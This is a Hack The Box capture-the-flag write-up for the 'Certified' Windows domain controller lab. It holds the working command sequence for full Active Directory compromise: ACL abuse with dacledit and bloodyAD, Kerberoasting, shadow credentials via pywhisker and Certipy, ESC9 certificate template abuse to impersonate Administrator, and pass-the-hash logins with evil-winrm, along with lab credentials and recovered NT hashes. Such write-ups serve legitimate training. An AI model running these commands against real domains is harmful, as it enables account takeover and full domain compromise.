HTB-Certified

eugewx2025-03-122025-08-09

Box Info

Difficulty	Medium
OS	Windows
IP Address	10.10.11.41

Credentials

As is common in Windows pentests, you will start the Certified box with credentials for the following account:

1	judith.mader : judith09

Port Scanning

# Check all open TCP
sudo rustscan 10.10.11.41 -r 1-65535 --ulimit 5000
# Nmap scan with script on open TCP port
sudo nmap 10.10.11.41 -sCV -Pn -sT -p53,88,135,139,389,445,464,593,636,3269,3268,5985,9389,49666,49668,49673,49674,49683,49713,49737,61797
# Nmap scan vulnerability 
sudo nmap -sT -p53,88,135,139,389,445,464,593,636,3269,3268,5985,9389,49666,49668,49673,49674,49683,49713,49737,61797 --script=vuln -O -Pn 10.10.11.41
# Nmap scan with UDP port
sudo nmap -sU --top-ports 20 -Pn 10.10.11.41

PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-03-11 18:00:52Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: certified.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.certified.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.certified.htb
| Not valid before: 2024-05-13T15:49:36
|_Not valid after:  2025-05-13T15:49:36
|_ssl-date: 2025-03-11T18:02:20+00:00; +6h42m01s from scanner time.
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: certified.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.certified.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.certified.htb
| Not valid before: 2024-05-13T15:49:36
|_Not valid after:  2025-05-13T15:49:36
|_ssl-date: 2025-03-11T18:02:20+00:00; +6h42m01s from scanner time.
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: certified.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-03-11T18:02:20+00:00; +6h42m01s from scanner time.
| ssl-cert: Subject: commonName=DC01.certified.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.certified.htb
| Not valid before: 2024-05-13T15:49:36
|_Not valid after:  2025-05-13T15:49:36
3269/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: certified.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-03-11T18:02:20+00:00; +6h42m01s from scanner time.
| ssl-cert: Subject: commonName=DC01.certified.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.certified.htb
| Not valid before: 2024-05-13T15:49:36
|_Not valid after:  2025-05-13T15:49:36
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open  mc-nmf        .NET Message Framing
49666/tcp open  msrpc         Microsoft Windows RPC
49668/tcp open  msrpc         Microsoft Windows RPC
49673/tcp open  msrpc         Microsoft Windows RPC
49674/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49683/tcp open  msrpc         Microsoft Windows RPC
49713/tcp open  msrpc         Microsoft Windows RPC
49737/tcp open  msrpc         Microsoft Windows RPC
61797/tcp open  msrpc         Microsoft Windows RPC
123/udp   open          ntp
53/udp    open          domain
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Update DNS

1 2	sudo nano /etc/hosts sudo echo "10.10.11.41 certified.htb dc01.certified.htb"

Service Enumeration

389/tcp LDAP

As the machine is consider enumerated with the credentials provided. Here I will use it for bloodhound the AD information

sudo ntpdate 10.10.11.41 && bloodhound-python -u "judith.mader" -p "judith09" -d certified.htb -c All --zip -ns 10.10.11.41

sudo neo4j start
bloodhound

Here it provide the path to us, that we can start from the WriteOwner permission to the MANAGEMENT group and GenericWrite to Management_svc

WriteOwner to Management Group

WriteOwner means user has the ability to modify the owner of the group Management. Here we will use Dacledit.py to abuse ownership of Management group, and grant judith.mader user to AddMember privilege.

sudo ntpdate 10.10.11.41 && python3.13 ~/Desktop/AD/Impacket/examples/dacledit.py -action 'write' -rights 'WriteMembers' -principal 'judith.mader' -target-dn 'CN=MANAGEMENT,CN=USERS,DC=CERTIFIED,DC=HTB' "certified.htb"/"judith.mader":"judith09"

Next, gain the read access for judith.mader

sudo ntpdate 10.10.11.41 && python3.13 ~/Desktop/AD/Impacket/examples/dacledit.py -action 'read' -rights 'WriteMembers' -principal 'judith.mader' -target-dn 'CN=MANAGEMENT,CN=USERS,DC=CERTIFIED,DC=HTB' "certified.htb"/"judith.mader":"judith09"

Now we can add user into the management group through BloodyAD

1 2	source venv/bin/activate python bloodyAD.py --host "10.10.11.41" -d "Certified.htb" -u "judith.mader" -p "judith09" add groupMember "MANAGEMENT" "judith.mader"

GenericWrite to management_svc

Added judith user into management, from the bloodhound now we will abuse the GenericWrite privilege to Management_svc service user. Generic Write access grants you the ability to write to any non-protected attribute on the target object, including “members” for a group, and “SPN” for a user.

From bloodhound suggest to use targetedKerberoast to obtain management_svc

1	python targetedKerberoast.py -v -d 'Certified.htb' -u 'judith.mader' -p 'judith09'

Now we had obtained the management_svc tgt hash, we can use hashcat to crack the password

1 2	code management_svc.hash hashcat -m 13100 management_svc.hash /usr/share/wordlists/rockyou.txt

Result is exhausted.. then I think it should not be the right way to crack it.

Exploit KeyCredentialLink

From the bloodhound did suggest alternative way to Exploit KeyCredentialLink by using pywhisker.

https://github.com/ShutdownRepo/pywhisker

python3 -m venv venv
source venv/bin/activate
pip install -r requirements.txt
sudo ntpdate 10.10.11.41 && python pywhisker.py -d "certified.htb" -u "judith.mader" -p 'judith09' --target "management_svc" --action "add"

Troubleshoot insufficient rights

If it shows insufficient rights, please redo again from WriteOwner to Management Group in quick.

Troubleshoot OpenSSL.crypto has no attribute ‘PKCS12’

1
2
3

python3 -m venv venv
source env/bin/activate
pip install pyopenssl==19.1.0

Now we obtained the pfx cert and password. Lets move it to the correct directory

1	mv *.pfx ~/Desktop/HTB/Season6/Certified

Obtaining TGT

https://github.com/dirkjanm/PKINITtools

Generated a Kerberos TGT for management_svc

python3 -m venv venv
source venv/bin/activate
pip install minikerberos oscrypto impacket pyasn1
python3 gettgtpkinit.py certified.htb/management_svc -cert-pfx ~/Desktop/HTB/Season6/Certified/09iDGE4i.pfx -pfx-pass JeAFPZxXH4uBfNdBwmdv ccache

Recovering NT Hash

Extracted NT hash for management_svc using gettgtpkinit

1 2	export KRB5CCNAME=./ccache python3 getnthash.py certified.htb/management_svc -key 5a2818a3d64a96f4cddc3db46eba555deabe7cabc5c77126abb6f33401212fb6

Now we had obtained management_svc user NT Hash

1	management_svc : a091c1832bcdd4677c28b5a6a1295584

Initiate User Foothold

Validate management user

1	nxc winrm 10.10.11.41 -u management_svc -d certified.htb -H a091c1832bcdd4677c28b5a6a1295584

1	evil-winrm -H a091c1832bcdd4677c28b5a6a1295584 -i 10.10.11.41 -u management_svc

Privilege Escalation

GenericAll to ca_operator

From the bloodhound we know that management_svc have GenericAll permission to CA_Operator

Here we will use Certipy-AD tools to obtain CA user NThash

https://github.com/ly4k/Certipy

source venv/bin/activate
pip install certipy-ad

certipy shadow auto -username management_svc@certified.htb -hashes :a091c1832bcdd4677c28b5a6a1295584 -account ca_operator -dc-ip 10.10.11.41

Here we had obtained ca_operator NT hash

1	ca_operator : 259745cb123a52aa2e693aaacca2db52

ADCS

As from the official Microsoft document, ca_operator is managing the CA servers. Therefore, we could utilize certipy to check any vulnerable value in the target AD CA service.

1	certipy find -u 'ca_operator' -hashes 259745cb123a52aa2e693aaacca2db52 -dc-ip 10.10.11.41 -vulnerable -stdout

Update ca_operator UPN to administrator

Here we can found the CA server is vulnerable to ESC9 that allow ca_operator to enroll and template has no security extension

https://www.thehacker.recipes/ad/movement/adcs/certificate-templates#no-security-extension-esc9

https://research.ifcr.dk/certipy-4-0-esc9-esc10-bloodhound-gui-new-authentication-and-request-methods-and-more-7237d88061f7

Now we’re going to change ca_operator UPN to administrator

1	certipy account update -u management_svc@certified.htb -hashes a091c1832bcdd4677c28b5a6a1295584 -user ca_operator -upn Administrator

Request vulnerable certificate using ca_operator by abusing ESC9

1	sudo ntpdate 10.10.11.41 && certipy req -username ca_operator@certified.htb -hashes 259745cb123a52aa2e693aaacca2db52 -target 10.10.11.41 -ca certified-DC01-CA -template CertifiedAuthentication

Restoring Original UPN

1	certipy-ad account update -u management_svc@certified.htb -hashes a091c1832bcdd4677c28b5a6a1295584 -user ca_operator -upn ca_operator@certified.htb

Authenticate with the obtained certificate will provide the Administrator’s NT hash during UnPac the hash

1	certipy auth -pfx 'administrator.pfx' -domain certified.htb

Now we obtained administrator NT Hash

1	aad3b435b51404eeaad3b435b51404ee:0d5b49608bbce1751f708748f67e2d34

Initiate Root Foothold

Validate win-rm

1	nxc winrm 10.10.11.41 -u administrator -d certified.htb -H 0d5b49608bbce1751f708748f67e2d34

1	evil-winrm -H 0d5b49608bbce1751f708748f67e2d34 -i 10.10.11.41 -u administrator